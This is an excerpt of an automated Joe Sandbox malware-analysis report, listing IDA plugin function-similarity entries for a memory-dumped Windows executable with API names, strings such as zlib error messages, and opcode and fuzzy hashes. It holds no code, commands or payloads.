                                                              • API String ID: 298514914-0
                                                              • Opcode ID: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                              • Instruction ID: 65bd0fc00ed65caac6c8ae18375092c396c339aa9c4fc9a556ba9f8eb5a1fbfe
                                                              • Opcode Fuzzy Hash: 1b9229a9ff34361a6518eb59eadc8af634e0fb6f78aa303e2f888cecdd8f7a24
                                                              • Instruction Fuzzy Hash: F141E132205B408AEB129F62EC443E977A0F78CBD5F484129EB490B774DF39C959D740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: _wcsdupfreewcsncpy$Value
                                                              • String ID:
                                                              • API String ID: 1554701960-0
                                                              • Opcode ID: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                              • Instruction ID: 9aa5ebfb9d0338231e5de8689cc7ecd01d3be8732c0a46cca62a2a5aa1271af7
                                                              • Opcode Fuzzy Hash: 1d879e7a0acd0c0829ed1bc558ef67cfa511ed4a967529a3de4af1c33dacc62b
                                                              • Instruction Fuzzy Hash: FB91BFB2604A8185EA76DF13B9507EA73A0FB48BD5F484225BFCA476E5EB38C542C701
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$ClassDestroyEnableProcUnregister
                                                              • String ID:
                                                              • API String ID: 1570244450-0
                                                              • Opcode ID: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction ID: 9942cbda7600913111d3f6e009e2264a98590d225334710fbbc2bdadcd09b10d
                                                              • Opcode Fuzzy Hash: 91bde67e80f91e2742b9164cbcf556c590c39b782bd753c692008bc4014d2561
                                                              • Instruction Fuzzy Hash: F121F9B4204A5182FB56DB27F8483A923A1E78CBC1F549126FB4A4B7B5DF3DC8459700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                                                              • String ID:
                                                              • API String ID: 3383493704-0
                                                              • Opcode ID: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                              • Instruction ID: 80f857dfb6a9a2f530fca3cb10c8fb692f8ca5f83b5b0ec86a1534c3d91aadad
                                                              • Opcode Fuzzy Hash: 58dc5949c501ee915ee066136f95cf395d457a23a7ff8083782f65faeab631ed
                                                              • Instruction Fuzzy Hash: 9D11397020064182EB46AB27A9483B962A1EB8CBC4F448024FA0A4B6B5DF7DC5458301
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProcSleep
                                                              • String ID: InitOnceExecuteOnce$Kernel32.dll
                                                              • API String ID: 938261879-1339284965
                                                              • Opcode ID: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction ID: 258e5301f75bcfa7e340e12184f2e3f20ed82b399a9dd39da3854f47a4428b06
                                                              • Opcode Fuzzy Hash: 9cc1215efa9171b7dae7fadfb2c47d350fa49a6ad5bcb444afd81da3a54d843a
                                                              • Instruction Fuzzy Hash: AB118F3120974585EB5ADF57E8843E973A0FB8CBD0F488029AB0A0B666EF3AC595C340
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Window$CurrentThread$EnableEnumWindows
                                                              • String ID:
                                                              • API String ID: 2527101397-0
                                                              • Opcode ID: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction ID: 08829170a8ee5f1b49cfdf050f6537c1ef42b3a6330418e8cb94bb4851fba9f1
                                                              • Opcode Fuzzy Hash: 819563b769547833593462bfdd9e557783e2fe60f6ea2978649c293be4a90c74
                                                              • Instruction Fuzzy Hash: 6D3171B261064182FB62CF22F5487A977A1F75CBE9F484215FB6947AF9CB79C844CB00
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocValue$Heap
                                                              • String ID:
                                                              • API String ID: 2472784365-0
                                                              • Opcode ID: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction ID: 773301f083ee798336704ec3d5312664b9b868eef9dc2a5d6ba13fea1fa7b4fd
                                                              • Opcode Fuzzy Hash: 817cb6a234a385814b06518aa112c5efe756708d8e68811ae307d73ca14c2163
                                                              • Instruction Fuzzy Hash: 3821F434200B8096EB4A9B92F8843E963A5F7DCBD0F548429FB4D47B79DE3DC8858740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$CloseCreateEnterHandleLeaveObjectSingleThreadWait
                                                              • String ID:
                                                              • API String ID: 458812214-0
                                                              • Opcode ID: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction ID: 6ed0f769cbd5916c92599595d34faf5ec2fc13e913d525d246d608b89e2aac48
                                                              • Opcode Fuzzy Hash: 6a38117e792cc01899f22305820c9a0c290a6e73bcc29c544877765eca75b33b
                                                              • Instruction Fuzzy Hash: FD210076204B0081EB06DB22E8943E973A4FB8CBC4F988026EB4D47779DF39C946C340
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$FreeHeap$DeleteEnterLeave
                                                              • String ID:
                                                              • API String ID: 3171405041-0
                                                              • Opcode ID: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction ID: 030e86aa03d9d600b90796447865b7023312810cb66964dcc71f9bcfbca43c2c
                                                              • Opcode Fuzzy Hash: 5bac674c3f8342d6cd0aac8621eb4a2ebf53081d1a9cae62f807694b4d99e6ae
                                                              • Instruction Fuzzy Hash: 4721E735201B4485EB4ADB57E5903E823A4F78CBC4F444115AB5E0B7B6CF3AC4A5C340
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalSection$AllocHeap$EnterInitializeLeave
                                                              • String ID:
                                                              • API String ID: 2544007295-0
                                                              • Opcode ID: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction ID: 3c708bd0e8d6be70d523372ffb5b6a2e3cd9d0d7dbc1ea7b56162c86fa93b61b
                                                              • Opcode Fuzzy Hash: 964df89806ab1b98e43ea449fff5c56c6dda4054a8aa2c3e42b83df1ec0c2f38
                                                              • Instruction Fuzzy Hash: 5E413932605B8086EB5ADF56E4403E877A4F79CBD0F54812AEB4D4BBA5DF39C8A5C700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memset$memmove
                                                              • String ID:
                                                              • API String ID: 3527438329-0
                                                              • Opcode ID: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction ID: dba297aa8fb042b18ff0822facc25e4acf5e394d44c3b4579297ae20e1131b5c
                                                              • Opcode Fuzzy Hash: 1e0a837dc669331cc5957db2528f79886a441c50ac0b901b14f5572dc67d68da
                                                              • Instruction Fuzzy Hash: E231007271064081FB16DA2BE4507E96612E38DBD0F848126EB1A83BAACA7EC502C740
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $ $header crc mismatch
                                                              • API String ID: 0-4092041874
                                                              • Opcode ID: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction ID: f6894c87bdfd3a48e6411c52319aba3e102a5ca19e93322268f312efd41433f4
                                                              • Opcode Fuzzy Hash: 55b197aa7f59ea79f5e67b8aaa8e0c71fa88c311ff36f0bd1c48ebfad87586ba
                                                              • Instruction Fuzzy Hash: 41A18FB26003508BFB269E1AC48C7AE3BE6F7587C8F064558EB964B3A4D776C954C780
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heapwcsncpy$AllocFree
                                                              • String ID:
                                                              • API String ID: 1479455602-0
                                                              • Opcode ID: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction ID: 28fd82db213d89e843f0df720333d3fbeca218ccf85cb71e10007619eb34b75b
                                                              • Opcode Fuzzy Hash: bd39aa7686407ba85d86bffb32f51c5ca4b87867d279337be1c8d10c74bedb84
                                                              • Instruction Fuzzy Hash: BF51A0B2B0068486EA66DF26A404BEA67E1F789BD4F588125EF4D477E5EB3CC542C300
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: memmove
                                                              • String ID: $ $invalid stored block lengths
                                                              • API String ID: 2162964266-1718185709
                                                              • Opcode ID: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction ID: 754f218cd566fbce8dd602483dcb0b6cf2df6dd41c0e80f26ad42ee7a9f80f3a
                                                              • Opcode Fuzzy Hash: 5a154506d4633e528a7a17bae092f7a518f978704b3b8509104772513ba27d3c
                                                              • Instruction Fuzzy Hash: 3A417B766006508BE7268F27D5887AE3BA0F3087C8F155119FF8A4BBA4C776D8A1CB40
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: EntryFunctionLookup$UnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3286588846-0
                                                              • Opcode ID: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction ID: 3ebace1c390976f506d0f99ca18ed721a427f0b26ede3763bfd5663c46823d1b
                                                              • Opcode Fuzzy Hash: a43c6ac0d422a0cb868a81bf0a3177776bf41fbc22bf78c230eac44af0668553
                                                              • Instruction Fuzzy Hash: 48512E66A15FC481EA61CB29E5453ED63A0FB9DB84F09A215DF8C13756EF34D2D4C700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CharLower
                                                              • String ID:
                                                              • API String ID: 1615517891-0
                                                              • Opcode ID: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction ID: 89447f37e157e5f910190f26039f07b44efb98263a832e051549732566d91b47
                                                              • Opcode Fuzzy Hash: c79849e46724dc2abb30ea88d6992f20c8495c80adfb737506759087bbbff476
                                                              • Instruction Fuzzy Hash: BB2181766006A092EA66EF13A8047BA76A0F748BF5F5A4211FFD5072E0DB35C495D710
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction ID: 84a502ef329111f45b75735ee98b05bbb8abde518fb530cc481733cdeaf2302d
                                                              • Opcode Fuzzy Hash: 0f974c86f1a7e361068b693f653777688ae97df7ee1888e934fdd283249f1d8a
                                                              • Instruction Fuzzy Hash: 76216532608B8086D725CF56B44079AB7A5F7887D4F088325FF9917BA9DF3DC5529700
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                              • String ID:
                                                              • API String ID: 4012708801-0
                                                              • Opcode ID: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction ID: 658b845125df41e3d707b834e255611bbe4f6e958313e82604e3ea1cd6ed1d71
                                                              • Opcode Fuzzy Hash: 47ccaf1a7f74cd3e733cb6c5cd31dbbbe8972a233b29932fb87548b6fe9d3e17
                                                              • Instruction Fuzzy Hash: 50016972314A5092E7219B26A5807AAA3B4FB88BC0F548026EB4987774DF3AC8528300
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction ID: a4d5f086a96e389f2db612197d0023b8b07f868559dabceebcf4944cd54701ff
                                                              • Opcode Fuzzy Hash: 38d32e320765f0e197812c7802676496a175ef663a849a6793450ef0177ea7f4
                                                              • Instruction Fuzzy Hash: 47513A72601B44C7EB5ACF26E18039873A5F78CF88F188526EB4E4B766DB35D4A1C750
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocHeapmemsetwcscpywcslen
                                                              • String ID:
                                                              • API String ID: 1807340688-0
                                                              • Opcode ID: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction ID: 2291175711b854bc4f74fb4265d0f1bd771c1a5bff4f4550b8324bf1b1149364
                                                              • Opcode Fuzzy Hash: d18a2de789b4fced0d5c5c7af7bdf7f4ac513c7a43bb144637d931b1f82fec87
                                                              • Instruction Fuzzy Hash: DA3129B1605B4081EB16EF27A5443ECB7A1EB8CFD4F588126AF4D0B7AADF39C4518351
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: Heap$Free$Alloc
                                                              • String ID:
                                                              • API String ID: 3901518246-0
                                                              • Opcode ID: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction ID: 7f7b652e9f7b58be947c1c734e7a82da3d99598ff0fb71c13e03353473737a2d
                                                              • Opcode Fuzzy Hash: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction Fuzzy Hash: 063142B2211B409BE702DF13EA807A937A4F78CBD0F448429EB4847B65DF79E4A6C740
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                                              • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction ID: 61c3440d716b3c64d08436ee48054615140ae5ecb8d8084460387f48d4e9dd56
                                                              • Opcode Fuzzy Hash: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction Fuzzy Hash: BB11C13260878082EB25CF26B41076AB7A4FB89BE4F140328EF9D57BE5DF39C0118704
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
